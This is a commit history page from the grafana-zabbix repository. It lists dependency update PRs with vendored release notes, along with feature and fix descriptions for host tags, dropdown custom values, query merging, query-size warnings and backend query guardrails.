da27b9a917d301dcaa7f302bcc083aedf09ba870
2283 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
ismail simsek
|
da27b9a917 |
chore(deps): update various dependencies (#2166)
yarn 4.9.4 -> 4.12.0 glob 11.1.0 -> 13.0.0 js-yaml 4.1.0 -> 4.1.1 |
||
renovate-sh-app[bot]
|
7ad809c654 |
chore(deps): update actions/setup-go action to v5.6.0 (#2164)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/setup-go](https://redirect.github.com/actions/setup-go) | action | minor | `v5.3.0` → `v5.6.0` | --- ### Release Notes <details> <summary>actions/setup-go (actions/setup-go)</summary> ### [`v5.6.0`](https://redirect.github.com/actions/setup-go/releases/tag/v5.6.0) [Compare Source](https://redirect.github.com/actions/setup-go/compare/v5.5.0...v5.6.0) #### What's Changed - Fall back to downloading from go.dev/dl instead of storage.googleapis.com/golang by [@​aparnajyothi-y](https://redirect.github.com/aparnajyothi-y) in [#​689](https://redirect.github.com/actions/setup-go/pull/689) **Full Changelog**: <https://github.com/actions/setup-go/compare/v5...v5.6.0> ### [`v5.5.0`](https://redirect.github.com/actions/setup-go/releases/tag/v5.5.0) [Compare Source](https://redirect.github.com/actions/setup-go/compare/v5.4.0...v5.5.0) #### What's Changed ##### Bug fixes: - Update self-hosted environment validation by [@​priyagupta108](https://redirect.github.com/priyagupta108) in [#​556](https://redirect.github.com/actions/setup-go/pull/556) - Add manifest validation and improve error handling by [@​priyagupta108](https://redirect.github.com/priyagupta108) in [#​586](https://redirect.github.com/actions/setup-go/pull/586) - Update template link by [@​jsoref](https://redirect.github.com/jsoref) in [#​527](https://redirect.github.com/actions/setup-go/pull/527) ##### Dependency updates: - Upgrade [@​action/cache](https://redirect.github.com/action/cache) from 4.0.2 to 4.0.3 by [@​aparnajyothi-y](https://redirect.github.com/aparnajyothi-y) in [#​574](https://redirect.github.com/actions/setup-go/pull/574) - Upgrade [@​actions/glob](https://redirect.github.com/actions/glob) from 0.4.0 to 0.5.0 by [@​dependabot](https://redirect.github.com/dependabot) in [#​573](https://redirect.github.com/actions/setup-go/pull/573) - Upgrade ts-jest from 29.1.2 to 29.3.2 by [@​dependabot](https://redirect.github.com/dependabot) in [#​582](https://redirect.github.com/actions/setup-go/pull/582) - Upgrade eslint-plugin-jest from 27.9.0 to 28.11.0 by [@​dependabot](https://redirect.github.com/dependabot) in [#​537](https://redirect.github.com/actions/setup-go/pull/537) #### New Contributors - [@​jsoref](https://redirect.github.com/jsoref) made their first contribution in [#​527](https://redirect.github.com/actions/setup-go/pull/527) **Full Changelog**: <https://github.com/actions/setup-go/compare/v5...v5.5.0> ### [`v5.4.0`](https://redirect.github.com/actions/setup-go/releases/tag/v5.4.0) [Compare Source](https://redirect.github.com/actions/setup-go/compare/v5.3.0...v5.4.0) #### What's Changed ##### Dependency updates : - Upgrade semver from 7.6.0 to 7.6.3 by [@​dependabot](https://redirect.github.com/dependabot) in [#​535](https://redirect.github.com/actions/setup-go/pull/535) - Upgrade eslint-config-prettier from 8.10.0 to 10.0.1 by [@​dependabot](https://redirect.github.com/dependabot) in [#​536](https://redirect.github.com/actions/setup-go/pull/536) - Upgrade [@​action/cache](https://redirect.github.com/action/cache) from 4.0.0 to 4.0.2 by [@​aparnajyothi-y](https://redirect.github.com/aparnajyothi-y) in [#​568](https://redirect.github.com/actions/setup-go/pull/568) - Upgrade undici from 5.28.4 to 5.28.5 by [@​dependabot](https://redirect.github.com/dependabot) in [#​541](https://redirect.github.com/actions/setup-go/pull/541) #### New Contributors - [@​aparnajyothi-y](https://redirect.github.com/aparnajyothi-y) made their first contribution in [#​568](https://redirect.github.com/actions/setup-go/pull/568) **Full Changelog**: <https://github.com/actions/setup-go/compare/v5...v5.4.0> </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
76c7603a4c |
chore(deps): update dependency cspell to v6.31.3 (#2165)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [cspell](https://cspell.org/) ([source](https://redirect.github.com/streetsidesoftware/cspell/tree/HEAD/packages/cspell)) | [`6.13.3` → `6.31.3`](https://renovatebot.com/diffs/npm/cspell/6.13.3/6.31.3) |  |  | --- ### Release Notes <details> <summary>streetsidesoftware/cspell (cspell)</summary> ### [`v6.31.3`](https://redirect.github.com/streetsidesoftware/cspell/releases/tag/v6.31.3) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.31.2...v6.31.3) #### What's Changed - fix: Fix dynamic loader on Windows by [@​Jason3S](https://redirect.github.com/Jason3S) in [#​4707](https://redirect.github.com/streetsidesoftware/cspell/pull/4707) **Full Changelog**: <https://github.com/streetsidesoftware/cspell/compare/v6.31.2...v6.31.3> ### [`v6.31.2`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#6312-2023-04-14) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.31.1...v6.31.2) **Note:** Version bump only for package cspell ### [`v6.31.1`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#6311-2023-03-24) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.31.0...v6.31.1) **Note:** Version bump only for package cspell ### [`v6.31.0`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#6310-2023-03-24) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.30.2...v6.31.0) **Note:** Version bump only for package cspell #### 6.30.2 (2023-03-18) ##### Bug Fixes - lock cosmiconfig to 8.0.0 ([#​4335](https://redirect.github.com/streetsidesoftware/cspell/issues/4335)) ([0f37e2c]( |
||
Jocelyn Collado-Kuri
|
9fda7768ff |
Add support to use custom values in dropdown (#2163)
## Summary
When we switched to use `Combobox` we were no longer able to add custom
values for our dropdowns, and this prevented users from using regexp
values for `group`, `host`, `proxy` etc. This PR adds
`createCustomValue` flag so that any custom value can be entered into
the dropdowns.
## Detailed summary
- Make use of `Combobox`'s `createCustomValues` so that wherever
necessary, users are able to enter regex values.
<img width="720" height="221" alt="Screenshot 2026-01-05 at 7 15 23 AM"
src="https://github.com/user-attachments/assets/841716eb-cd86-49d1-b13c-a0e37e8a37b9"
/>
## Why
For users to be able to use regexp, and any custom value in our
dropdowns.
## How to test
For all query types where dropdowns are used and user configurable (i.e.
group, host, proxy, application) start typing a value that does not
already exist in the dropdown. You should see an option to `Use custom
value`
Fixes
[comment](https://github.com/grafana/grafana-zabbix/pull/2141#issuecomment-3698818476),
thanks for the testing and call out @christos-diamantis
|
||
|
Jocelyn Collado-Kuri
|
0d64736e86 |
Adds support for host tags (#2140)
## Sumary When dealing with multiple hosts, it can be hard for customers filter through and figure out which host to query metric data from. This PR aims to make this easier by adding support for host tags so that there is another layer of filtering / grouping applied for hosts. ## Detailed explanation - Adds new UI components to allow adding one or more host tag filter, and a switch to choose between `AND/OR` and `OR` operators when using more than one filter following Zabbix's UI: https://github.com/user-attachments/assets/c971f5eb-7e93-4238-bd6b-902cc657c014 https://github.com/user-attachments/assets/5f8996de-684e-4ffa-b98e-8e205c4fc1df - Modifies the existing `getHosts` function to make a call to the backend with a few additional parameters to `extend` (essentially extract) the host tags for a given selected group. No backend changes were required for this. ## Why To make it easier for customers to query metric data when dealing with multiple hosts. ## How to test - Go to explore or a dashboard and create a Zabbix query where the query type is `Metrics` - The easiest way to test is by selecting `/.*/` for Groups, checking the returned `Hosts` they should all be there - Add a host tag filter and change the keys and operators as well as switching from `AND/OR` to `OR` you should see how the values returned for `Host` changes ## Future work Adding variable support for host tags once this is completed. Fixes: https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=3609900134&issue=grafana%7Coss-big-tent-squad%7C126 and https://github.com/grafana/grafana-zabbix/issues/927 --------- Co-authored-by: ismail simsek <ismailsimsek09@gmail.com> |
||
|
Jocelyn Collado-Kuri
|
3d0895c008 |
Fix the way we merge frontend and backend queries (#2158)
## Summary With the new logic to merge backend and frontend query responses, some of the frontend query responses were being lost due to early termination. Merging frontend and backend responses was not properly waiting for all promises to resolve before returning this "merged" result ## Detailed explanation In `mergeQueries` although `Promise.all` was triggered, we returned immediately without waiting for the promises to actually resolve, now instead of passing down promises: - use `switchMap` so that the upstream backend response observable can be used as an inner Observable value to be concatenated with the rest of the responses - Why not use `map`? To prevent out of sync results, we need to wait for the promises to resolve **before** we pass it down to the `mergeQueries` function, `map` does not allow that. - use `from` and trigger `Promise.all` **before** calling `mergeQueries` so that all promise results can be resolved and converted to observables by the time they get passed into the function - modify `mergeQueries` to accept `DataResponse` for arguments, clone the existing data and return the merged result. <img width="1700" height="398" alt="Screenshot 2025-12-29 at 1 06 05 PM" src="https://github.com/user-attachments/assets/c07c59b1-43b8-47f9-adc6-67583b125856" /> ## Why To fix how frontend and backend queries are merged so that no response gets lost in the process ## How to test 1. Create a new dashboard or go to Explore 2. For query type select `Problems` or anything that is not `Metrics` 3. Execute the query, and you should be able to see a response. |
||
|
renovate-sh-app[bot]
|
4eb55efa59 |
chore(deps): update dependency @playwright/test to ^1.55.0 (#2156)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@playwright/test](https://playwright.dev) ([source](https://redirect.github.com/microsoft/playwright)) | [`^1.52.0` → `^1.55.0`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.55.0/1.57.0) |  |  | --- ### Release Notes <details> <summary>microsoft/playwright (@​playwright/test)</summary> ### [`v1.57.0`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.57.0) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.56.1...v1.57.0) #### Speedboard In HTML reporter, there's a new tab we call "Speedboard": <img width="600" alt="speedboard" src="https://github.com/user-attachments/assets/4ba117ea-ea94-4b6a-82b2-8bbd00dfe81c" /> It shows you all your executed tests sorted by slowness, and can help you understand where your test suite is taking longer than expected. Take a look at yours - maybe you'll find some tests that are spending a longer time waiting than they should! #### Chrome for Testing Starting with this release, Playwright switches from Chromium, to using [Chrome for Testing](https://developer.chrome.com/blog/chrome-for-testing/) builds. Both headed and headless browsers are subject to this. Your tests should still be passing after upgrading to Playwright 1.57. We're expecting no functional changes to come from this switch. The biggest change is the new icon and title in your toolbar. <img width="500" alt="new and old logo" src="https://github.com/user-attachments/assets/e9a5c4f2-9f35-4c27-9382-0f5eda377097" /> If you still see an unexpected behaviour change, please [file an issue](https://redirect.github.com/microsoft/playwright/issues/new). On Arm64 Linux, Playwright continues to use Chromium. #### Waiting for webserver output [testConfig.webServer](https://playwright.dev/docs/api/class-testconfig#test-config-web-server) added a `wait` field. Pass a regular expression, and Playwright will wait until the webserver logs match it. ```js import { defineConfig } from '@​playwright/test'; export default defineConfig({ webServer: { command: 'npm run start', wait: { stdout: '/Listening on port (?<my_server_port>\\d+)/' }, }, }); ``` If you include a named capture group into the expression, then Playwright will provide the capture group contents via environment variables: ```js import { test, expect } from '@​playwright/test'; test.use({ baseUrl: `http://localhost:${process.env.MY_SERVER_PORT ?? 3000}` }); test('homepage', async ({ page }) => { await page.goto('/'); }); ``` This is not just useful for capturing varying ports of dev servers. You can also use it to wait for readiness of a service that doesn't expose an HTTP readiness check, but instead prints a readiness message to stdout or stderr. #### Breaking Change After 3 years of being deprecated, we removed `Page#accessibility` from our API. Please use other libraries such as [Axe](https://www.deque.com/axe/) if you need to test page accessibility. See our Node.js [guide](https://playwright.dev/docs/accessibility-testing) for integration with Axe. #### New APIs - New property [testConfig.tag](https://playwright.dev/docs/api/class-testconfig#test-config-tag) adds a tag to all tests in this run. This is useful when using [merge-reports](https://playwright.dev/docs/test-sharding#merging-reports-from-multiple-shards). - [worker.on('console')](https://playwright.dev/docs/api/class-worker#worker-event-console) event is emitted when JavaScript within the worker calls one of console API methods, e.g. console.log or console.dir. [worker.waitForEvent()](https://playwright.dev/docs/api/class-worker#worker-wait-for-event) can be used to wait for it. - [locator.description()](https://playwright.dev/docs/api/class-locator#locator-description) returns locator description previously set with [locator.describe()](https://playwright.dev/docs/api/class-locator#locator-describe), and `Locator.toString()` now uses the description when available. - New option [`steps`](https://playwright.dev/docs/api/class-locator#locator-click-option-steps) in [locator.click()](https://playwright.dev/docs/api/class-locator#locator-click) and [locator.dragTo()](https://playwright.dev/docs/api/class-locator#locator-drag-to) that configures the number of `mousemove` events emitted while moving the mouse pointer to the target element. - Network requests issued by [Service Workers](https://playwright.dev/docs/service-workers#network-events-and-routing) are now reported and can be routed through the [BrowserContext](https://playwright.dev/docs/api/class-browsercontext), only in Chromium. You can opt out using the `PLAYWRIGHT_DISABLE_SERVICE_WORKER_NETWORK` environment variable. - Console messages from Service Workers are dispatched through [worker.on('console')](https://playwright.dev/docs/api/class-worker#worker-event-console). You can opt out of this using the `PLAYWRIGHT_DISABLE_SERVICE_WORKER_CONSOLE` environment variable. #### Browser Versions - Chromium 143.0.7499.4 - Mozilla Firefox 144.0.2 - WebKit 26.0 ### [`v1.56.1`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.56.1) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.56.0...v1.56.1) #### Highlights [#​37871](https://redirect.github.com/microsoft/playwright/issues/37871) chore: allow local-network-access permission in chromium [#​37891](https://redirect.github.com/microsoft/playwright/issues/37891) fix(agents): remove workspaceFolder ref from vscode mcp [#​37759](https://redirect.github.com/microsoft/playwright/issues/37759) chore: rename agents to test agents [#​37757](https://redirect.github.com/microsoft/playwright/issues/37757) chore(mcp): fallback to cwd when resolving test config #### Browser Versions - Chromium 141.0.7390.37 - Mozilla Firefox 142.0.1 - WebKit 26.0 ### [`v1.56.0`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.56.0) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.55.1...v1.56.0) #### Playwright Agents Introducing Playwright Agents, three custom agent definitions designed to guide LLMs through the core process of building a Playwright test: - **🎭 planner** explores the app and produces a Markdown test plan - **🎭 generator** transforms the Markdown plan into the Playwright Test files - **🎭 healer** executes the test suite and automatically repairs failing tests Run `npx playwright init-agents` with your client of choice to generate the latest agent definitions: ```bash # Generate agent files for each agentic loop # Visual Studio Code npx playwright init-agents --loop=vscode # Claude Code npx playwright init-agents --loop=claude # opencode npx playwright init-agents --loop=opencode ``` > \[!NOTE] > VS Code v1.105 (currently on the VS Code Insiders channel) is needed for the agentic experience in VS Code. It will become stable shortly, we are a bit ahead of times with this functionality! [Learn more about Playwright Agents](https://playwright.dev/docs/test-agents) #### New APIs - New methods [page.consoleMessages()](https://playwright.dev/docs/api/class-page#page-console-messages) and [page.pageErrors()](https://playwright.dev/docs/api/class-page#page-page-errors) for retrieving the most recent console messages from the page - New method [page.requests()](https://playwright.dev/docs/api/class-page#page-requests) for retrieving the most recent network requests from the page - Added [`--test-list` and `--test-list-invert`](https://playwright.dev/docs/test-cli#test-list) to allow manual specification of specific tests from a file #### UI Mode and HTML Reporter - Added option to `'html'` reporter to disable the "Copy prompt" button - Added option to `'html'` reporter and UI Mode to merge files, collapsing test and describe blocks into a single unified list - Added option to UI Mode mirroring the `--update-snapshots` options - Added option to UI Mode to run only a single worker at a time #### Breaking Changes - Event [browserContext.on('backgroundpage')](https://playwright.dev/docs/api/class-browsercontext#browser-context-event-background-page) has been deprecated and will not be emitted. Method [browserContext.backgroundPages()](https://playwright.dev/docs/api/class-browsercontext#browser-context-background-pages) will return an empty list #### Miscellaneous - Aria snapshots render and compare `input` `placeholder` - Added environment variable `PLAYWRIGHT_TEST` to Playwright worker processes to allow discriminating on testing status #### Browser Versions - Chromium 141.0.7390.37 - Mozilla Firefox 142.0.1 - WebKit 26.0 ### [`v1.55.1`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.55.1) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.55.0...v1.55.1) ##### Highlights [#​37479](https://redirect.github.com/microsoft/playwright/issues/37479) - \[Bug]: Upgrade Chromium to 140.0.7339.186. [#​37147](https://redirect.github.com/microsoft/playwright/issues/37147) - \[Regression]: Internal error: step id not found. [#​37146](https://redirect.github.com/microsoft/playwright/issues/37146) - \[Regression]: HTML reporter displays a broken chip link when there are no projects. [#​37137](https://redirect.github.com/microsoft/playwright/pull/37137) - Revert "fix(a11y): track inert elements as hidden". [#​37532](https://redirect.github.com/microsoft/playwright/pull/37532) - chore: do not use -k option #### Browser Versions - Chromium 140.0.7339.186 - Mozilla Firefox 141.0 - WebKit 26.0 This version was also tested against the following stable channels: - Google Chrome 139 - Microsoft Edge 139 </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [x] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: Sriram <153843+yesoreyeram@users.noreply.github.com> |
||
dependabot[bot]
|
0232194405 |
Bump qs from 6.14.0 to 6.14.1 (#2161)
Bumps [qs](https://github.com/ljharb/qs) from 6.14.0 to 6.14.1. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/ljharb/qs/blob/main/CHANGELOG.md">qs's changelog</a>.</em></p> <blockquote> <h2><strong>6.14.1</strong></h2> <ul> <li>[Fix] ensure arrayLength applies to <code>[]</code> notation as well</li> <li>[Fix] <code>parse</code>: when a custom decoder returns <code>null</code> for a key, ignore that key</li> <li>[Refactor] <code>parse</code>: extract key segment splitting helper</li> <li>[meta] add threat model</li> <li>[actions] add workflow permissions</li> <li>[Tests] <code>stringify</code>: increase coverage</li> <li>[Dev Deps] update <code>eslint</code>, <code>@ljharb/eslint-config</code>, <code>npmignore</code>, <code>es-value-fixtures</code>, <code>for-each</code>, <code>object-inspect</code></li> </ul> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
f3c5a15a20 |
chore(deps): update dependency @grafana/plugin-e2e to ^2.2.3 (#2155)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@grafana/plugin-e2e](https://redirect.github.com/grafana/plugin-tools) ([source](https://redirect.github.com/grafana/plugin-tools/tree/HEAD/packages/plugin-e2e)) | [`^2.1.12` → `^2.2.3`](https://renovatebot.com/diffs/npm/@grafana%2fplugin-e2e/2.1.12/2.2.3) |  |  | --- ### Release Notes <details> <summary>grafana/plugin-tools (@​grafana/plugin-e2e)</summary> ### [`v2.2.3`](https://redirect.github.com/grafana/plugin-tools/releases/tag/%40grafana/plugin-e2e%402.2.3) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.2...@grafana/plugin-e2e@2.2.3) ##### 🐛 Bug Fix - CreatePlugin: Adding step about health check functionality in ds tutorial. [#​2222](https://redirect.github.com/grafana/plugin-tools/pull/2222) ([@​mckn](https://redirect.github.com/mckn)) ##### Authors: 1 - Marcus Andersson ([@​mckn](https://redirect.github.com/mckn)) ### [`v2.2.2`](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.1...@grafana/plugin-e2e@2.2.2) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.1...@grafana/plugin-e2e@2.2.2) ### [`v2.2.1`](https://redirect.github.com/grafana/plugin-tools/blob/HEAD/packages/plugin-e2e/CHANGELOG.md#v221-Thu-Oct-09-2025) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.0...@grafana/plugin-e2e@2.2.1) ##### 🐛 Bug Fix - E2E: fix for flakiness in PanelEditPage.refreshPanel [#​2207](https://redirect.github.com/grafana/plugin-tools/pull/2207) ([@​hugohaggmark](https://redirect.github.com/hugohaggmark)) ##### Authors: 1 - Hugo Häggmark ([@​hugohaggmark](https://redirect.github.com/hugohaggmark)) *** ### [`v2.2.0`](https://redirect.github.com/grafana/plugin-tools/blob/HEAD/packages/plugin-e2e/CHANGELOG.md#v220-Tue-Oct-07-2025) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.14...@grafana/plugin-e2e@2.2.0) ##### 🚀 Enhancement - Plugin E2E: Add support for specifying user preferences [#​2131](https://redirect.github.com/grafana/plugin-tools/pull/2131) ([@​sunker](https://redirect.github.com/sunker)) ##### Authors: 1 - Erik Sundell ([@​sunker](https://redirect.github.com/sunker)) *** ### [`v2.1.14`](https://redirect.github.com/grafana/plugin-tools/blob/HEAD/packages/plugin-e2e/CHANGELOG.md#v2114-Mon-Sep-29-2025) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.13...@grafana/plugin-e2e@2.1.14) ##### 🐛 Bug Fix - Update dependency uuid to v13 [#​2139](https://redirect.github.com/grafana/plugin-tools/pull/2139) ([@​renovate\[bot\]](https://redirect.github.com/renovate\[bot])) ##### Authors: 1 - [@​renovate\[bot\]](https://redirect.github.com/renovate\[bot]) *** ### [`v2.1.13`](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.12...@grafana/plugin-e2e@2.1.13) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.12...@grafana/plugin-e2e@2.1.13) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
ismail simsek
|
ef9557f60e |
Add time range warning in query editor for large time ranges (#2150)
## Summary Adds a non-intrusive warning banner in the query editor that alerts users when the selected time range exceeds 1 year (365 days). This helps users understand that their query may return a large amount of data and could take longer to execute, without blocking or interrupting their workflow. Part of https://github.com/grafana/oss-big-tent-squad/issues/127 ## Changes - Added `TIME_RANGE_WARNING_THRESHOLD_DAYS` constant (365 days) in `src/datasource/constants.ts` - Created new `TimeRangeWarning` component in `src/datasource/components/TimeRangeWarning.tsx` - Integrated the warning component into the main `QueryEditor` component ## How it works - When the dashboard time range is >= 365 days, a warning banner appears at the top of the query editor - The warning displays the formatted duration (e.g., "1 year and 30 days") - The warning is purely informational - queries still execute normally - Uses Grafana theme colors for consistent styling in both light and dark modes ## Screenshot The warning appears as a subtle banner with a warning icon: <img width="705" height="374" alt="grafik" src="https://github.com/user-attachments/assets/eb0ace4b-524a-488e-8f88-b7e9523660b0" /> ## Why Queries spanning years of data can return millions of data points and potentially overload the Zabbix server. This proactive warning helps users make informed decisions about their query scope without adding friction to the normal query flow. |
||
|
dependabot[bot]
|
3d631aedd7 |
Bump glob from 10.4.5 to 11.1.0 (#2153)
Bumps [glob](https://github.com/isaacs/node-glob) from 10.4.5 to 11.1.0. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/isaacs/node-glob/blob/main/changelog.md">glob's changelog</a>.</em></p> <blockquote> <h1>changeglob</h1> <h2>13</h2> <ul> <li>Move the CLI program out to a separate package, <code>glob-bin</code>. Install that if you'd like to continue using glob from the command line.</li> </ul> <h2>12</h2> <ul> <li>Remove the unsafe <code>--shell</code> option. The <code>--shell</code> option is now ONLY supported on known shells where the behavior can be implemented safely.</li> </ul> <h2>11.1</h2> <p><a href="https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2">GHSA-5j98-mcp5-4vw2</a></p> <ul> <li>Add the <code>--shell</code> option for the command line, with a warning that this is unsafe. (It will be removed in v12.)</li> <li>Add the <code>--cmd-arg</code>/<code>-g</code> as a way to <em>safely</em> add positional arguments to the command provided to the CLI tool.</li> <li>Detect commands with space or quote characters on known shells, and pass positional arguments to them safely, avoiding <code>shell:true</code> execution.</li> </ul> <h2>11.0</h2> <ul> <li>Drop support for node before v20</li> </ul> <h2>10.4</h2> <ul> <li>Add <code>includeChildMatches: false</code> option</li> <li>Export the <code>Ignore</code> class</li> </ul> <h2>10.3</h2> <ul> <li>Add <code>--default -p</code> flag to provide a default pattern</li> <li>exclude symbolic links to directories when <code>follow</code> and <code>nodir</code> are both set</li> </ul> <h2>10.2</h2> <ul> <li>Add glob cli</li> </ul> <h2>10.1</h2> <ul> <li>Return <code>'.'</code> instead of the empty string <code>''</code> when the current working directory is returned as a match.</li> <li>Add <code>posix: true</code> option to return <code>/</code> delimited paths, even on</li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
ismail simsek
|
04fca562b0 |
feat(backend): Add query guardrails to prevent potential issues (#2149)
## Summary Implements query guardrails in the backend to prevent execution of expensive or malformed queries that could impact customer environments. Part of https://github.com/grafana/oss-big-tent-squad/issues/127 ## Changes ### New guardrails added: 1. **Item ID validation** (`queryItemIdData`) - Validates that item IDs are non-empty - Validates that item IDs contain only numeric values 2. **Time range validation** (`QueryData`) - Validates that `From` timestamp is before `To` timestamp 3. **API method allowlist** (`ZabbixAPIHandler`) - Only allows Zabbix API methods defined in the frontend type `zabbixMethodName` - Blocks any write/delete/update operations not in the allowlist ### New files: - `pkg/datasource/guardrails.go` - Validation functions and error definitions - `pkg/datasource/guardrails_test.go` - Unit tests for all validation functions ### Modified files: - `pkg/datasource/datasource.go` - Added time range validation - `pkg/datasource/zabbix.go` - Added item ID validation - `pkg/datasource/resource_handler.go` - Added API method validation ## Reasoning - Allowed functions might be unnecessary as we've already prevent using those in [types.ts](https://github.com/grafana/grafana-zabbix/blob/main/src/datasource/zabbix/types.ts#L1-L23) but it's nice to be cautious. - itemid and time validation is just for sanity. - Time range validation will be necessary in the future to warn user agains running expensive queries. |
||
|
ismail simsek
|
3e626d3aa5 |
Add item count warning in query editor for large result sets (#2152)
## Summary Adds a non-intrusive warning banner in the query editor that alerts users when their query matches a large number of items (>= 500). This helps users understand that their query may return a large amount of data and suggests using more specific filters. Part of https://github.com/grafana/oss-big-tent-squad/issues/127 ## Changes - Added `ITEM_COUNT_WARNING_THRESHOLD` constant (500 items) in `src/datasource/constants.ts` - Created new `ItemCountWarning` component in `src/datasource/components/ItemCountWarning.tsx` - Updated `MetricsQueryEditor` to track and report the count of items matching the current filter - Integrated the warning component into the main `QueryEditor` component ## How it works - When items are loaded for the dropdown in the Metrics query editor, the component counts how many items match the current item filter - If using a regex filter like `/.*/`, it applies the regex to count matching items - If the count is >= 500, a warning banner appears at the top of the query editor - The warning is purely informational - queries still execute normally - The warning only appears for the "Metrics" query type ## Screenshot The warning appears as a subtle banner with a warning icon: > I set the limit as 5 just to show the warning <img width="901" height="298" alt="grafik" src="https://github.com/user-attachments/assets/a9be8563-1b90-4581-ad15-4e7035b4166e" /> ## Why Queries that match thousands of items via wildcard filters (e.g., `/.*/`) can return massive amounts of data and potentially overload the Zabbix server. This proactive warning helps users make informed decisions about their query scope without adding friction to the normal query flow. |
||
|
renovate-sh-app[bot]
|
4eece4b75e |
chore(deps): update dependency terser-webpack-plugin to ^5.3.14 (#2154)
